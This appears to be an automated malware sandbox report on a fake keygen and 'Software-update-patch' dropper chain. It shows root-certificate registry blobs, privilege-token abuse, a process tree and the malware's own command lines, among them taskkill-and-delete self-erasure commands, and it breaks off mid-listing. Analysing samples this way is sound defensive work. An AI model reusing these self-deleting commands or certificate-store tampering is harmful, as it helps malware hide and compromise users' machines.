4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd oAKAmWkbAngMjKcBt.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703085c000000010000000400000000080000200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e oAKAmWkbAngMjKcBt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 tapinstall.exe -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 4968 PING.EXE 2212 PING.EXE 1240 PING.EXE 7448 PING.EXE -
Suspicious behavior: EnumeratesProcesses 62 IoCs
Processes:
Software-update-patc_535592163.tmpExercitationem.exeSoftware-update-patc_988440081.tmpvpn.tmpZembra.exeSoftware-update-patc_988440081.tmpmsiexec.exemask_svc.exemask_svc.exeSoftware-update-patc_612604768.tmpmask_svc.exeSoftware-update-patc_612604768.tmpQuibusdam.exepid process 1196 Software-update-patc_535592163.tmp 1196 Software-update-patc_535592163.tmp 1088 Exercitationem.exe 1088 Exercitationem.exe 1088 Exercitationem.exe 1088 Exercitationem.exe 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 5024 Software-update-patc_988440081.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 2964 Zembra.exe 2964 Zembra.exe 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 4196 Software-update-patc_988440081.tmp 604 msiexec.exe 604 msiexec.exe 1844 mask_svc.exe 1844 mask_svc.exe 2964 Zembra.exe 2964 Zembra.exe 2964 Zembra.exe 2964 Zembra.exe 2964 Zembra.exe 2964 Zembra.exe 908 mask_svc.exe 908 mask_svc.exe 2964 Zembra.exe 2964 Zembra.exe 2336 Software-update-patc_612604768.tmp 2336 Software-update-patc_612604768.tmp 1604 mask_svc.exe 1604 mask_svc.exe 1604 mask_svc.exe 1604 mask_svc.exe 1604 mask_svc.exe 1604 mask_svc.exe 4336 Software-update-patc_612604768.tmp 4336 Software-update-patc_612604768.tmp 4080 Quibusdam.exe 4080 Quibusdam.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exeoAKAmWkbAngMjKcBt.exevpn.tmpdescription pid process Token: SeSecurityPrivilege 604 msiexec.exe Token: SeCreateTokenPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeAssignPrimaryTokenPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeLockMemoryPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeIncreaseQuotaPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeMachineAccountPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeTcbPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSecurityPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeTakeOwnershipPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeLoadDriverPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSystemProfilePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSystemtimePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeProfSingleProcessPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeIncBasePriorityPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeCreatePagefilePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeCreatePermanentPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeBackupPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeRestorePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeShutdownPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeDebugPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeAuditPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSystemEnvironmentPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeChangeNotifyPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeRemoteShutdownPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeUndockPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSyncAgentPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeEnableDelegationPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeManageVolumePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeImpersonatePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeCreateGlobalPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeDebugPrivilege 4536 vpn.tmp Token: SeCreateTokenPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeAssignPrimaryTokenPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeLockMemoryPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeIncreaseQuotaPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeMachineAccountPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeTcbPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSecurityPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeTakeOwnershipPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeLoadDriverPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSystemProfilePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSystemtimePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeProfSingleProcessPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeIncBasePriorityPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeCreatePagefilePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeCreatePermanentPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeBackupPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeRestorePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeShutdownPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeDebugPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeAuditPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSystemEnvironmentPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeChangeNotifyPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeRemoteShutdownPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeUndockPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeSyncAgentPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeEnableDelegationPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeManageVolumePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeImpersonatePrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeCreateGlobalPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeCreateTokenPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeAssignPrimaryTokenPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeLockMemoryPrivilege 4880 oAKAmWkbAngMjKcBt.exe Token: SeIncreaseQuotaPrivilege 4880 oAKAmWkbAngMjKcBt.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exeSoftware-update-patc_535592163.tmpoAKAmWkbAngMjKcBt.exeSoftware-update-patc_988440081.tmpvpn.tmppid process 4556 Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe 1196 Software-update-patc_535592163.tmp 4880 oAKAmWkbAngMjKcBt.exe 5024 Software-update-patc_988440081.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp 4536 vpn.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
Software-update-patc_579570356.sfx.exeMicrosoftEdge.exepid process 3552 Software-update-patc_579570356.sfx.exe 3552 Software-update-patc_579570356.sfx.exe 3552 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software-update-patc_535592163.exeSoftware-update-patc_535592163.tmpExercitationem.exeUR1E1OJkSMSPSwU0.exevpn.exeSoftware-update-patc_988440081.exemsiexec.exekahRa2R1.exeoAKAmWkbAngMjKcBt.exeUR1E1OJkSMSPSwU0.execmd.exevpn.tmpcmd.exeSoftware-update-patc_988440081.execmd.exesvchost.exedescription pid process target process PID 644 wrote to memory of 1196 644 Software-update-patc_535592163.exe Software-update-patc_535592163.tmp PID 644 wrote to memory of 1196 644 Software-update-patc_535592163.exe Software-update-patc_535592163.tmp PID 644 wrote to memory of 1196 644 Software-update-patc_535592163.exe Software-update-patc_535592163.tmp PID 1196 wrote to memory of 1088 1196 Software-update-patc_535592163.tmp Exercitationem.exe PID 1196 wrote to memory of 1088 1196 Software-update-patc_535592163.tmp Exercitationem.exe PID 1196 wrote to memory of 1088 1196 Software-update-patc_535592163.tmp Exercitationem.exe PID 1088 wrote to memory of 1312 1088 Exercitationem.exe UR1E1OJkSMSPSwU0.exe PID 1088 wrote to memory of 1312 1088 Exercitationem.exe UR1E1OJkSMSPSwU0.exe PID 1088 wrote to memory of 1312 1088 Exercitationem.exe UR1E1OJkSMSPSwU0.exe PID 1312 wrote to memory of 4916 1312 UR1E1OJkSMSPSwU0.exe UR1E1OJkSMSPSwU0.exe PID 1312 wrote to memory of 4916 1312 UR1E1OJkSMSPSwU0.exe UR1E1OJkSMSPSwU0.exe PID 1312 wrote to memory of 4916 1312 UR1E1OJkSMSPSwU0.exe UR1E1OJkSMSPSwU0.exe PID 1312 wrote to memory of 4916 1312 UR1E1OJkSMSPSwU0.exe UR1E1OJkSMSPSwU0.exe PID 1312 wrote to memory of 4916 1312 UR1E1OJkSMSPSwU0.exe UR1E1OJkSMSPSwU0.exe PID 1088 wrote to memory of 4720 1088 Exercitationem.exe kahRa2R1.exe PID 1088 wrote to memory of 4720 1088 Exercitationem.exe kahRa2R1.exe PID 1088 wrote to memory of 4720 1088 Exercitationem.exe kahRa2R1.exe PID 1088 wrote to memory of 4880 1088 Exercitationem.exe oAKAmWkbAngMjKcBt.exe PID 1088 wrote to memory of 4880 1088 Exercitationem.exe oAKAmWkbAngMjKcBt.exe PID 1088 wrote to memory of 4880 1088 Exercitationem.exe oAKAmWkbAngMjKcBt.exe PID 1088 wrote to memory of 4024 1088 Exercitationem.exe vpn.exe PID 1088 wrote to memory of 4024 1088 Exercitationem.exe vpn.exe PID 1088 wrote to memory of 4024 1088 Exercitationem.exe vpn.exe PID 4024 wrote to memory of 4536 4024 vpn.exe vpn.tmp PID 4024 wrote to memory of 4536 4024 vpn.exe vpn.tmp PID 4024 wrote to memory of 4536 4024 vpn.exe vpn.tmp PID 1132 wrote to memory of 5024 1132 Software-update-patc_988440081.exe Software-update-patc_988440081.tmp PID 1132 wrote to memory of 5024 1132 Software-update-patc_988440081.exe Software-update-patc_988440081.tmp PID 1132 wrote to memory of 5024 1132 Software-update-patc_988440081.exe Software-update-patc_988440081.tmp PID 604 wrote to memory of 1788 604 msiexec.exe MsiExec.exe PID 604 wrote to memory of 1788 604 msiexec.exe MsiExec.exe PID 604 wrote to memory of 1788 604 msiexec.exe MsiExec.exe PID 4720 wrote to memory of 2964 4720 kahRa2R1.exe Zembra.exe PID 4720 wrote to memory of 2964 4720 kahRa2R1.exe Zembra.exe PID 4720 wrote to memory of 2964 4720 kahRa2R1.exe Zembra.exe PID 4880 wrote to memory of 1348 4880 oAKAmWkbAngMjKcBt.exe msiexec.exe PID 4880 wrote to memory of 1348 4880 oAKAmWkbAngMjKcBt.exe msiexec.exe PID 4880 wrote to memory of 1348 4880 oAKAmWkbAngMjKcBt.exe msiexec.exe PID 4916 wrote to memory of 2180 4916 UR1E1OJkSMSPSwU0.exe cmd.exe PID 4916 wrote to memory of 2180 4916 UR1E1OJkSMSPSwU0.exe cmd.exe PID 4916 wrote to memory of 2180 4916 UR1E1OJkSMSPSwU0.exe cmd.exe PID 2180 wrote to memory of 3052 2180 cmd.exe taskkill.exe PID 2180 wrote to memory of 3052 2180 cmd.exe taskkill.exe PID 2180 wrote to memory of 3052 2180 cmd.exe taskkill.exe PID 604 wrote to memory of 2284 604 msiexec.exe MsiExec.exe PID 604 wrote to memory of 2284 604 msiexec.exe MsiExec.exe PID 604 wrote to memory of 2284 604 msiexec.exe MsiExec.exe PID 4536 wrote to memory of 2188 4536 vpn.tmp cmd.exe PID 4536 wrote to memory of 2188 4536 vpn.tmp cmd.exe PID 4536 wrote to memory of 2188 4536 vpn.tmp cmd.exe PID 2188 wrote to memory of 4208 2188 cmd.exe tapinstall.exe PID 2188 wrote to memory of 4208 2188 cmd.exe tapinstall.exe PID 3684 wrote to memory of 4196 3684 Software-update-patc_988440081.exe Software-update-patc_988440081.tmp PID 3684 wrote to memory of 4196 3684 Software-update-patc_988440081.exe Software-update-patc_988440081.tmp PID 3684 wrote to memory of 4196 3684 Software-update-patc_988440081.exe Software-update-patc_988440081.tmp PID 4536 wrote to memory of 3940 4536 vpn.tmp cmd.exe PID 4536 wrote to memory of 3940 4536 vpn.tmp cmd.exe PID 4536 wrote to memory of 3940 4536 vpn.tmp cmd.exe PID 3940 wrote to memory of 3156 3940 cmd.exe tapinstall.exe PID 3940 wrote to memory of 3156 3940 cmd.exe tapinstall.exe PID 4388 wrote to memory of 912 4388 svchost.exe DrvInst.exe PID 4388 wrote to memory of 912 4388 svchost.exe DrvInst.exe PID 4388 wrote to memory of 1192 4388 svchost.exe DrvInst.exe PID 4388 wrote to memory of 1192 4388 svchost.exe DrvInst.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software-update-patc_579570356.sfx.exe"C:\Users\Admin\AppData\Local\Temp\Software-update-patc_579570356.sfx.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe"C:\Users\Admin\Desktop\Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe"1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-6.exekeygen-step-6.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\KiffAppE2.exe"4⤵
-
C:\Users\Admin\Documents\PlsWnEU2.exe"C:\Users\Admin\Documents\PlsWnEU2.exe"5⤵
-
C:\Users\Admin\Documents\PlsWnEU2.exeC:\Users\Admin\Documents\PlsWnEU2.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Crack.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\DownFlSetup133.exe"4⤵
-
C:\Users\Admin\AppData\Roaming\525093.exe"C:\Users\Admin\AppData\Roaming\525093.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\5704187.exe"C:\Users\Admin\AppData\Roaming\5704187.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\3658051.exe"C:\Users\Admin\AppData\Roaming\3658051.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4785864.exe"C:\Users\Admin\AppData\Roaming\4785864.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\1873656.exe"C:\Users\Admin\AppData\Roaming\1873656.exe"5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md1_1eaf.exe"4⤵
-
C:\Users\Admin\Desktop\Software-update-patc_535592163.exe"C:\Users\Admin\Desktop\Software-update-patc_535592163.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-TQ5KN.tmp\Software-update-patc_535592163.tmp"C:\Users\Admin\AppData\Local\Temp\is-TQ5KN.tmp\Software-update-patc_535592163.tmp" /SL5="$70080,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_535592163.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Ut\quam\Exercitationem.exe"C:\Program Files (x86)\Ut/\quam\Exercitationem.exe" 8208c5e16842608234b91821ef4b1c3f3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exeC:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe /usthree SUB=8208c5e16842608234b91821ef4b1c3f4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exeC:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe /usthree SUB=8208c5e16842608234b91821ef4b1c3f5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "UR1E1OJkSMSPSwU0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\qT4leffV\UR1E1OJkSMSPSwU0.exe" & exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "UR1E1OJkSMSPSwU0.exe" /f7⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exeC:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe /VERYSILENT4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Zembra.exeC:\Users\Admin\AppData\Local\Temp\Zembra.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Zembra.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Zembra.exe" & del C:\ProgramData\*.dll & exit6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Zembra.exe /f7⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 67⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\ZembraBro.exeC:\Users\Admin\AppData\Local\Temp\ZembraBro.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\ZembraBro.exeC:\Users\Admin\AppData\Local\Temp\ZembraBro.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe & exit5⤵
-
C:\Windows\SysWOW64\PING.EXEping 06⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exeC:\Users\Admin\AppData\Local\Temp\ZH8xtvo4\oAKAmWkbAngMjKcBt.exe /quiet SILENT=1 AF=606x8208c5e16842608234b91821ef4b1c3f4⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
